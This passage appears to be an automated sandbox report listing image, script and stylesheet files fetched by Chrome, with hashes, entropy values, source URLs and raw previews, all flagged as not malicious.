                                                                                                                                                                                                                                  SHA-256:C4DB75F643BB4DD47E39A9601FCC0A14621B588D5E4EBE987EE4828120BDE791
                                                                                                                                                                                                                                  SHA-512:5A94B97148037E9A25AF768AF67A1AD5D4959E5D5C216DC5353FB159630302A74A990CCA20F787C024C6B7229A12920B287A88A4063514FBA534E7D1DB094C11
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://ssl.gstatic.com/store/images/regionflags/us.png
                                                                                                                                                                                                                                  Preview:.PNG........IHDR...0...$.....=k.9....PLTE"u.#t."s..OO.PP.OO.........o.......tRNSJ....J..J.j.\...DIDATx.c`T..ec$.. .].A...1..Z..!..%p.A....H...0......*.....]...Qp...al.....IEND.B`.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:C source, ASCII text, with very long lines (438)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2078
                                                                                                                                                                                                                                  Entropy (8bit):5.387806824958302
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:YHTs34IWJ6O346+3+96s3zf3Ek+n8No4YGbIh4:6fIWJj3453wx3D3Ex8NMq
                                                                                                                                                                                                                                  MD5:C85FC19BDEF9BB7DC0AD69D0BCEF07D8
                                                                                                                                                                                                                                  SHA1:BDC00700BE6D5B5FBA7F565C6FB2FD1AD39D06A4
                                                                                                                                                                                                                                  SHA-256:6A694C1ECFF2EE11F8075A915B3C3FEEAF2EB33DC04CD8144CDD762E71260051
                                                                                                                                                                                                                                  SHA-512:DDF8AE079503BCE91ACC37A3A7552B52ED0DE2D9AF79076A1C04F7991D3775C7A829298D5A3A9962040A5C2FB6A0699D6584510704004ECBCB6471D33BE38C5F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("Deferred",["Promise"],(function(a,b,c,d,e,f){"use strict";var g;(g||(g=b("Promise"))).resolve();a=function(){function a(a){var c=this;a=a||g||(g=b("Promise"));this.$1=!1;this.$2=new a(function(a,b){c.$3=a,c.$4=b})}var c=a.prototype;c.getPromise=function(){return this.$2};c.resolve=function(a){this.$1=!0,this.$3(a)};c.reject=function(a){this.$1=!0,this.$4(a)};c.isSettled=function(){return this.$1};return a}();f["default"]=a}),66);.__d("isArDotMetaDotComURI",[],(function(a,b,c,d,e,f){var g=new RegExp("(^|\\.)ar\\.meta\\.com$","i"),h=["https"];function a(a){if(a.isEmpty()&&a.toString()!=="#")return!1;return!a.getDomain()&&!a.getProtocol()?!1:h.indexOf(a.getProtocol())!==-1&&g.test(a.getDomain())}f["default"]=a}),66);.__d("isHorizonDotMetaDotComURI",[],(function(a,b,c,d,e,f){var g=new RegExp("(^|\\.)horizon\\.meta\\.com$","i"),h=["https"];function a(a){if(a.isEmpty()&&a.toString()!=="#")return!1;return!a.getDomain()&&!a.getProtocol()?!1:h.indexOf(a.getProtocol())!==
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):149756
                                                                                                                                                                                                                                  Entropy (8bit):7.989238660408578
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:VcA3uwoHMMbvFz64XTGbnzQd3jGFqtIlL40yf15Q:VtuwosMbNz6Up3tIh2jQ
                                                                                                                                                                                                                                  MD5:E05D2BCF282C4E29A516688740FAEE8D
                                                                                                                                                                                                                                  SHA1:65820D150DABE2D37AF5DAE46197719839D080A8
                                                                                                                                                                                                                                  SHA-256:F0B676B1B1AF7B64C39271D887DC07E70F8FEAF475A7D459B6DB30F258FDA4AB
                                                                                                                                                                                                                                  SHA-512:FB7F833AC8C12FCF9873C1308994B68CE1E5AA70118B4CA545AA54531449437823E0FC93867BD0C7EF556CF6B9C8ABD47E22DCEAC188E79305D0A8BADE01B65A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF.H..WEBPVP8L.H../..I.MH.d;l..G..@......$.D......:...T].t_w......{..9....ZU............}%..Zk...d.@.}....y......$%]H...Z.^.....u:)]...j..QUwGj..$2V......8......7..b........v.....W.ZIK.&~...H.V..F.6...)I..Fz$....F...I.!......}.e{.K....;czs.l.......~......o1..uB../.9g...........G.1.d;.W......hc.=......R.@.@P3YF.| ..s.....)-......,$.w...=Y........k...N.I.Z+F...\u .I.Z.I..n.0:..I@Fw7H......f.>4.R.|.|....l.$k.....|h.Ef'.t.Ww.$y.D...K..+IV.m.Z.s!.CG.... $..Iw.1j.. .Y.`$i...7.d.4.a..b...@..p....... . ].w......v...?...B..K.u...d.^..\W.....G. .$.$...V.....3.*i&.$.HI.*...wU....<d.SJ.(....9.ZS..[...|AK.$I.......g..5I.$F.8....,g.l{..m]..D.........B=.G....Q.....L..E.!.0.m.n....$.rZy..}.W...Pv.9-Z..Ap....?...~N...[..H....B..R.....a...x(.p....\......*..........#.S........E..!...............".< PB?.X...!.xK7G..........@....A:`wpp$.....P@C..\7Y...........m....n...3..O......B... .a...p.......!....?"5.+.....[.n.?\......3gn..wq......9sk...E1$U(&d,P...
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):39178
                                                                                                                                                                                                                                  Entropy (8bit):7.986263648230382
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:pkXIlvy3Jmdf7NDnfY4zGDgyOk1Qfdo/5IMVr2deM16QXEoX+ncl/qtEXEWL:pIECy7dfY4zGMyObfdo/5jmLXEm+nK/1
                                                                                                                                                                                                                                  MD5:CD2CF2DBFA12E22A6C553016D2913637
                                                                                                                                                                                                                                  SHA1:A94119AAA47E7A27CA8D104E15AABD04B33354B6
                                                                                                                                                                                                                                  SHA-256:2D4A8FCE6CF39A05B6EC8EC5054E1BD7A236B4767763D0E81333EE768F8D4E4F
                                                                                                                                                                                                                                  SHA-512:30012A778ECF9F3D349A0B42D0D7F67A22992DAD7BCAD5B81D9B04F6FBD7B7A82BCA15511A0430D115AB236F6190A78019F4C172CF18855670FAC0AED8E88304
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/rbz2GOYtKwW-yK99VC_CBSUL_k2PWkkL4NfYubMEmKBCPbGuNxZb_pP7N2WAKZsQUw=w416-h235-rw
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8L..../..2.M@r.H.$.1kD.....Y......?.../.E.>|.kTuH.v.m.[.#...:..vw.tkn..d..s.Pw..#I....n.,...1E.C....9"..'.#mo.....v.cYy.v.]y{...0.Hy..*....fM..._.k..@..X-..k8.........0S..@R+P...HR.6...|E.....b./0p.........I......0..;"...J..o...DIU.Z....$..J.\.%...o9U..!...%..Dkd}QD9..z@..W.#.s].".4...m.n.d.<.A.W..."3......3.#.v.....6~..x...oBx..T.$IRU%.....E.......K.X.?....R.((.........!. ....Q...............=.....`X..=J..LXJ.@A.e.oi"..E.2... .![..&....V)......"C8.*.....cD...|K$...X.(.......b..D"..JN..(.c...u...(.B..aTX..1...0....0.(..bx5.=..!..B[..e.z./.uz...Z.............f..f..@((.*...@..p......M....J.....|.......o..ed......2.....Kk.v./.S..+4oo.#J.Bs.b..k....u....!....%,1x..X..>...j;.......@.J.`..8.?.z?...cD>B...Fn.F....z..t.sDL...:....{.~......fL..$.....e:........hL ....t.x.Cm...J..PYIu..$#.B.....`.d$..4.T..-@.g......H..Y.6..Y......c.u...o.............efff..3/..x.s.{.{^W.'.:..u.....]....<Ex...4Z.Z.d..[X...U..W!...2..\..-.%WKV...*d-V.W.Z.Y.9.-V.+Y[.FaZrR-..S
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (6906)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):44745
                                                                                                                                                                                                                                  Entropy (8bit):5.439897654346927
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:h1dccM2SFV4I6JbrvragzviWkUl/x5QnB2fBe5ZTcRpNZHC95bPFPGj50o8hGnlS:HdcxV4FPWgfVl/x6B5iaIlUIHwr
                                                                                                                                                                                                                                  MD5:AB0BDE385D5EC9B7748814C2C3F9F410
                                                                                                                                                                                                                                  SHA1:AA909CED086990905CA1E37FC0474CB2AEDB3C3B
                                                                                                                                                                                                                                  SHA-256:567D55847C489926692207B35080D83B89F26C67632C55B84D643F29951A5C79
                                                                                                                                                                                                                                  SHA-512:0C4C479A195AE8B0FE9A4F5A36E5DA5E67F24953091FE49CF759683D6CCFA6556ACACDE2E15A340C94D561A43F07B3695D0B3AEDFCF7A59AEFD4DC8103AC15C4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://static.xx.fbcdn.net/rsrc.php/v3/yI/l/0,cross/X9tSrDjPzyV.css"
                                                                                                                                                                                                                                  Preview:._58-0{float:left;max-width:100%}._58-0 input._58al{border-left:.1px solid transparent}._58-2 ._58ak{border:none;cursor:text;margin:0 2px 2px 0;max-width:100%;overflow:hidden}._58-2 ._58al{border:none;display:inline-block;margin:0;vertical-align:middle}._58-3,._58-2 ._58al{font-size:100%}._58-3{left:0;min-width:3em;padding-right:2em;position:absolute;top:0;visibility:hidden;white-space:nowrap}._4tb6{cursor:text;float:left;vertical-align:middle;width:4px}.._9vry ._3ixn{position:absolute}.._z8p{position:relative}._z8p:before{border:2px solid #2887e6;border-radius:3px;bottom:-4px;content:'';left:-4px;pointer-events:none;position:absolute;right:-4px;top:-4px;z-index:2}.._2tt5{border-bottom:1px solid #ebedf0;padding-bottom:12px}._2tt6{padding:12px 0 8px 0}.._7mfb{margin:1px}._7mfb *{vertical-align:baseline}.._342h{color:#4b4f56;margin-bottom:0;margin-top:8px}._342i{border-bottom:solid 1px #e9eaeb}._2bh_{border-top:1px solid #e9eaeb;margin-top:8px}._966t{border-top:2px solid #dadde1;padding-
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3866)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):19130
                                                                                                                                                                                                                                  Entropy (8bit):5.4221724347090605
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:RjsiWNwmd+jZ2JU/ZxSb28AFznMpc7F58TfaUj3/3Moq9zbjBRq6LX:Cd+jZ4U/ZAzwznMp058TCUb/3Moq9zbX
                                                                                                                                                                                                                                  MD5:41A724E10E413D9A755408E0B34FF52F
                                                                                                                                                                                                                                  SHA1:10305955D1CA1020491154B0A6335906C15E09BA
                                                                                                                                                                                                                                  SHA-256:8DDEB914D648FE38E704E497B05AE625CAF1C912F9ECB432ED5E55A34E02D3E6
                                                                                                                                                                                                                                  SHA-512:AACC3306AF1988B2B04406247FBFC75C4D5521ECDD34B9FA982642766FE887B44F20019DB8E7607DDE0A189A2B000793D19CD92B332DEE8C3EE5EDDAF341B426
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/_/boq-play/_/js/k=boq-play.PlayStoreUi.ru.rIMe_465lJE.2021.O/ck=boq-play.PlayStoreUi.Y1yArtXW1Kk.L.B1.O/am=R7cZwOj6QDAJDPAPHgdjAQ/d=1/exm=A1yn5d,A7fCU,ArluEf,BBI74,BVgquf,BfdUQc,EEDORb,EFQ78c,GkRiKb,HnDLGf,IJGqxf,IZT63,IcVnM,JNoxi,KUM7Z,L1AAkb,LCkxpb,LEikZe,M2Qezd,MI6k7c,MdUzUe,Mlhmy,MpJwZc,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,PHUIyb,PrPYRd,QIhFr,RMhBfe,RQJprf,SdcwHb,SpsfSb,UUJqVe,Uas9Hd,Ug7Xab,Ulmmrd,V3dDOb,WO9ee,XVMNvd,Z5uLle,ZDZcre,ZfAoz,ZwDk9d,_b,_tp,aW3pY,aurFic,byfTOb,chfSwc,e5qFLc,ebZ3mb,fKUV3e,fPcQoe,gKWqec,gychg,hKSk3e,hc6Ubd,kJXwXb,kWgXee,kjKdXe,kr6Nlf,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mdR7q,n73qwf,oEJvKc,ovKuLd,pCKBF,pYCIec,pjICDe,pw70Gc,q0NEmc,rpbmN,s39S4,soHxf,tKHFxf,vrGZEc,w9hDv,wW2D8b,wg1P6b,ws9Tlc,xQtZb,xUdipf,yDVVkb,ywOR5c,z5Gxfe,zbML3c,zr1jrb/excm=_b,_tp,searchview/ed=1/wt=2/ujg=1/rs=AB1caFXJl0m234JZdkIlc9Y8a_1vUWHvZw/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;Hs0fpd:jLUKge;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;Rdd4dc:WXw8B;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;nAu0tf:z5Gxfe;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;sgjhQc:bQAegc;wR5FRb:O1Gjze;xqZiqf:BBI74;yEQyxe:TLjaTd;yxTchf:KUM7Z;zxnPse:GkRiKb/m=RqjULd"
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.aL=class{constructor(a,b,c){this.key=a;this.defaultValue=b;this.flagName=c}ctor(a){return typeof a==="boolean"?a:this.defaultValue}};._.u("RqjULd");.var Pbb=function(){return Obb??(Obb=Object.freeze({ie:a=>_.wd("iCzhFc").H(!1)||a===-1,environment:_.fi(_.wd("y2FhP"))??void 0,mda:_.fi(_.wd("MUE6Ne"))??void 0,Yq:_.fi(_.wd("cfb2h"))??void 0,Ll:_.gi(_.wd("yFnxrf"),-1),eZ:_.Oq(_.wd("fPDxwd")).map(a=>_.gi(a,0)).filter(a=>a>0)}))},Rbb=function(a){if(_.aa&&_.aa.performance&&_.aa.performance.memory){var b=_.aa.performance.memory;if(b){const c=new Qbb;isNaN(b.jsHeapSizeLimit)||_.Eh(c,1,Math.round(b.jsHeapSizeLimit).toString());isNaN(b.totalJSHeapSize)||._.Eh(c,2,Math.round(b.totalJSHeapSize).toString());isNaN(b.usedJSHeapSize)||_.Eh(c,3,Math.round(b.usedJSHeapSize).toString());_.G(a,Qbb,1,c)}}},Vbb=function(a){if(Sbb()){var b=performance.getEntriesByType("navigation");if(b&&b.length){var c=new
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (2701)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):3245
                                                                                                                                                                                                                                  Entropy (8bit):5.348177629215205
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:upnlrpevhTuAG9T+ojsBSBY7p0aCW1//H/71LJBMLEvgj+CCMSmvygNscKApaWv+:upnlruLeTdjBBYtPdfrpijC8vyepaTd
                                                                                                                                                                                                                                  MD5:706B93A70D825C3906B9080E0C5924E8
                                                                                                                                                                                                                                  SHA1:BA10D0661DF8C6762D99871F7168C2C729841592
                                                                                                                                                                                                                                  SHA-256:7C784877F18CDFF0C5F948BF11E89475E272EDB8A9130C5518B3EB71DDC74781
                                                                                                                                                                                                                                  SHA-512:9AD813150AD90DA8CBAB1A70C56F35130BD3F49F5A3A3372BF7B37ECD9444EA367FA7EBC4E70030843D913CD74665B6DB4F33FA1A2288222344FD9230B684007
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://js-cdn.music.apple.com/musickit/v2/components/musickit-components//p-9d409825.js
                                                                                                                                                                                                                                  Preview:/*!. * IMPORTANT NOTE:. * . * This file is licensed only for the use of Apple developers in providing MusicKit Web Services,. * and is subject to the Apple Media Services Terms and Conditions and the Apple Developer Program. * License Agreement. You may not copy, modify, re-host, or create derivative works of this file or the. * accompanying Documentation, or any part thereof, including any updates, without Apple's written consent.. * . * ACKNOWLEDGEMENTS:. * https://js-cdn.music.apple.com/musickit/v1/acknowledgements.txt. */.import{c as n,a as t}from"./p-2649b6ee.js";var o=n((function(n,t){Object.defineProperty(t,"__esModule",{value:!0}),t.default="undefined"!=typeof FastBoot?FastBoot.require("buffer").Buffer:"undefined"!=typeof process&&null!==process.versions&&null!==process.versions.node?Buffer:window.Buffer})),e=n((function(n,t){Object.defineProperty(t,"__esModule",{value:!0}),t.memoize=void 0,t.memoize=function(n){return function(...t){let o="",e=t.length;for(n._memoi
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 564 x 168, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):10071
                                                                                                                                                                                                                                  Entropy (8bit):7.891099481159603
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:qg2y7LIhCKi1ihWVEYumqlG+fhNmCdLhpUP4FKxozeMTGiI2TUiut8:qfy4hl67VXqg+fh39WxyeMzTU8
                                                                                                                                                                                                                                  MD5:F06B908907D5D4F2AAF733E2BEE7EA8E
                                                                                                                                                                                                                                  SHA1:073DCF14C7C312BE5DAEB4FA2113429E019FDBC7
                                                                                                                                                                                                                                  SHA-256:583714033CAB0D76045A8D4BBFB2326983F40D5C2CFA239E9527DA9617686E6B
                                                                                                                                                                                                                                  SHA-512:32CABBC903EC76538C30B4734924267BD1364236629ABFB36919CFE4BE498360A6C0D3142BBC8593B8418B807336912E612E56E358993CA80E6F93947E9434D3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://sayidanur.github.io/instagram.com/img/googleplay-button.png
                                                                                                                                                                                                                                  Preview:.PNG........IHDR...4...........t.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....pHYs...#...#.x.?v....tIME.......LIJ.....bKGD............&!IDATx.......;qT.$...E..qx.#"(..."!.u%..C0..D....r.(.k.I`...!.G1..M|.....<.%" ....b...35)..{.nUWW.. 3]]}.......D$.../...UW]5n.Q......B.!....z....a.EB...2q..5s........!..BH.f........>|.w...X....C.!..8.c`.'6......w66!..B....I...De.N......=[F..-....N.:.i.....!..B...i........y......E......cY... 18...B.!.D...V&M.T0.&Hj|e.k..&...!..B....i.y.A.%.+...A}..ac.B.!$v........q.3Af0...&..BH...w~..FIh.....B.!..3..-5H....L...B.!$m....'.......y3.!..BH.sj0..)4......$..BHZ@.BQ...q'.sj6!..B.$\(J...h....B.!i.]..+.8.Ah.j...L.!..4..^....3fa..8..0>..#..BH.i...B3y...B..M.n"..BH).;a.v^h.!....|.."..BHZ.1b..Q..g.*....B.!...wM..g..?C.!..BH)M...B.!.BC.!..B.!..B....B.!.BC.!..B....B.!.BC.!..B.!..B...BC2GMM..5K.-[&.7o..>......O>)#G....J.}...L....}.6......B..s........w.}.r.J.c.............*~....D.I.c..I...$....t..r..rh.&<.e.:
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):326
                                                                                                                                                                                                                                  Entropy (8bit):7.260242399614157
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:Ok5ZTz+FyXIzvulGnFYqS8R85GZTb0FvSowvpbRcp2gHNuXmr4ntIyJtoTwO3byl:LzSAXIzvu4FYqU8ZX0F6owRcp2rsAtM4
                                                                                                                                                                                                                                  MD5:6A4B15D70049AD2B6B2F67CDF08C885D
                                                                                                                                                                                                                                  SHA1:A52320107374D519D13397D2172236F4526EB7E6
                                                                                                                                                                                                                                  SHA-256:6213DCD17B474412DADFCF36A834F53E185A8DE8F9355AA51C632F6A025E0B20
                                                                                                                                                                                                                                  SHA-512:8002BE9302A602D66746EC7B8A0DE89BD27E58938EBAD206C90FAAC00898D44D29BA6F699A8CBC4A20BEE42013E69B896ABF17BAFBB83A29658FBC1B81D14BF5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/d6Y9q1SJXDASeD-93qMXL59Bq_JCd6Bm1cZr_zodlkVnq4ck3TpTWYcMpBwOsUGMQHw=s64-rw
                                                                                                                                                                                                                                  Preview:RIFF>...WEBPVP8L1.../?....\[.=z.*+}...T....m.mk<s...~.|..ED.'@.3.X....MQ%...B.....t..Z.Z4C0bJ=,....T}0..0...M...{.R...g.P...p#....7..U.&C(...Q^.|.i1.kRa.j..T...:..a;*X......h.G~.....+y~.UU>?.....3..t...j.ZTC@.)...j.....}#...o.b.&...@..oeb...at.[Y...e.:{K.cI.M.|....}..)...]p.1nE...".^."[P..;..gU..>.v...<G....
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):97906
                                                                                                                                                                                                                                  Entropy (8bit):7.988101683057573
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:x9oClSIDLCAl6g+8o0zWQjgsvs08QS8r7DUMBPxp0toc7OKObY55:7r93CAnNoM9dj8onTBPxCmc7hOg5
                                                                                                                                                                                                                                  MD5:1868B67F1EADD355F1135028ED909AFC
                                                                                                                                                                                                                                  SHA1:43DF74D2F617C49C4EC41BE8D0A3C15E20629E8F
                                                                                                                                                                                                                                  SHA-256:902C48DEBD8C4972AD0FEFD712764163D9993AD5EC45B13E1F0A8ED0F682E03D
                                                                                                                                                                                                                                  SHA-512:DF8F944D052B73BBE462BE9DF467919B020FCC97B293283463C42713C8005A73F84DD69DEE5568A6422B8FE96F14503DC0F7576C662D2E487E9166191711DE4E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/D4DUUFQDCsH9NIEa8hjMjQSWdtNhGX1Fd_jT-23ogAb5uMMqttqQDUJcUt4K_u8RYOQ=s256-rw
                                                                                                                                                                                                                                  Preview:RIFFj~..WEBPVP8L]~../..?.M@l.F...=........5D....Q.<.H....d....la?...6.=z.]...aW.....~.v....ZUc1~m.=..(.d...g...;I..'...93.3.(I.#u......#%..........J.-I3.fV..+I)/3R{KZ.-.'u'9.>.j....Q.aS.V.................N....nc...$.F.9....G.:IZW..k.....Y9.II.^K..,}iut.. .\..}I..\.X.$Y...$'.....K..........G..7(......f..$...$9....JI$.UTU..5I+..._..`..(I.....ff.3-.].....$..`I.I:..s..Qk..]T.@....3...."I.l.(..h..U.x....%...]14M..:(...8t.B..1F\z.2m.U.......c.#..B...m.Q...B(.J3....7.w..QX<.....k...@.. dk..)R..eb.:...........-.....;`... UJ.W.n..Z....;s'.=..J.Z....].......@....!|...L...[.}.!.S..d.F:...x.(@....w.N........hrTs.....mP[[....H.... ._&01.....K._T....&..Q?.Nj.K..q.MDF..X.....g...OyOw;.f.$.6:.I..W.U.....]...Vu.....t...x...h...nU?....].^...6..#......vF.`......"...Pb..Y...j.C.C.PS........8.&......]..k%...+....6....6\..M.2.......8.V.......%*..+]4.3.V.6..W..|.o..ttv....>{..K...wS..J...:X.5..f..C..}.N....vW.......X."s.v.r...v.....w...].T.....J.Bj.7.....x.......%..](
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (56486)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):57874
                                                                                                                                                                                                                                  Entropy (8bit):5.27812742704802
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:6QxJPpoj1J3s106OigQTl0Xh3mPv798TK/67qKMK3R3ygtQTvT:toj1JccGl0XCNgtQTL
                                                                                                                                                                                                                                  MD5:72194A5236771968F3CE2BAA7E07754F
                                                                                                                                                                                                                                  SHA1:62835C6784EB00F0A01B5235D002EB3F636746EF
                                                                                                                                                                                                                                  SHA-256:C340D2D25E2FAE8A64AF6AFD99A5D50D42EDA8C0602332345E67FE2487C612D3
                                                                                                                                                                                                                                  SHA-512:EC18040A10CD59A440A1B5DE3BB47F5D608DA48249D0E6B0E9EA5D7E6100E47601DC70DA4222F74B60DDD983DECF2BD41F1741F455490297A81D9E4EC7874927
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/../**. * License: https://www.facebook.com/legal/license/9cisb7Fe7ih/. */.__d("hoist-non-react-statics-2.5.0",[],(function(a,b,c,d,e,f){"use strict";var g={},h={exports:g};function i(){(function(b,c){typeof g==="object"&&typeof h!=="undefined"?h.exports=c():b.hoistNonReactStatics=c()})(this,function(){var a={childContextTypes:!0,contextTypes:!0,defaultProps:!0,displayName:!0,getDefaultProps:!0,getDerivedStateFromProps:!0,mixins:!0,propTypes:!0,type:!0},b={name:!0,length:!0,prototype:!0,caller:!0,callee:!0,arguments:!0,arity:!0},c=Object.defineProperty,d=Object.getOwnPropertyNames,e=Object.getOwnPropertySymbols,f=Object.getOwnPropertyDescriptor,g=Object.getPrototypeOf,h=g&&g(Object);return function i(j,k,l){if(typeof k!=="string"){if(h){var m=g(k);m&&m!==h&&i(j,m,l)}m=d(k);e&&(m=m.concat(e(k)));for(var n=0;n<m.length;++n){var o=m[n];if(!a[o]&&!b[o]&&(!l||!l[o])){var p=f(k,o);try{c(j,o,p)}catch(a){}}}return j}return j}})}var j=!1;function k(){j||(j=!0,i());return h.expor
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11900
                                                                                                                                                                                                                                  Entropy (8bit):7.979698894528496
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:4nitZWZDB4m2Rme8rwDV0Bn5+oov6ijiWJmCHxgNaj3AG5YeaRvmx6h2M:0IkdB4mQTDSRyiWJmCHxwGq/
                                                                                                                                                                                                                                  MD5:5F95006BFED89D91C40C9F8EB0572EB3
                                                                                                                                                                                                                                  SHA1:CB766FD85C02E2BE451D2A105DCC1BABB6F60E85
                                                                                                                                                                                                                                  SHA-256:61AAE5B6BB1C1334CE83F1D6D20BFCF9ED04C2936ACA95EE46CA71148C5ABDB3
                                                                                                                                                                                                                                  SHA-512:AED17F152F5899411369D1A82EA368F8BB8CAE881D1C8CD82A3D78B1B48AE70C5F53D1457A91530A4D17BF5F27AB344D33DAD2E70587150D5AA9F435173F17A2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFFt...WEBPVP8X..............VP8 .-.......*....>.N.I$"!..T.......-...g.O........?77.....P.r.....m.{.........7..~...{......m.......oL_e?A.._......|'.u...o.o.....G....{.s.....?.hO............{.G....Z...l....y......Q.......n......O..........G.w....?..g.....w........z..(......k...s.!.B..!...1.c..1.c..Z.:i..W.%5{c03I..Wk....6;.v...s.y.7'.CL......~X.!.).......r%7..........."...3{..W..c..E.}.MZ..,.Z....N....~o.'.ZT...B..!.Gw.1.[.1.r...2.G~.Ul..wBwp....piA...[-KS,1.@-#.2ikq..#....{.$..Q=...@p>^+.h.......fy.h.o..............%8........u.Ri..o..Q......Wn7..'...f.ya...J?.c.^<.|..?.u..b..!...D(A...a..*.2+KJ...D.[....,_..W._C.(s..`J.....`.d..by1.>...OR....uL;..&......Z9..^...3..>...qV4X..CF..*....a.gh"..!...K.e.V....%I.".*/R`&.6...e6...u!To..>B.U...7....(f.*..I......p.KR_.c.....0.;.h8.Kq!.\.{<S......FJ...q|....|..y..y.....,.(..W..A..y.xR...s.0$f..0..(Y._..Jm.G.m[,...S(.....+h...@m.....a..H..`vd.t..}.9w5C-.....5......*....jR.i.....k..oT......7]pg7..O%..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
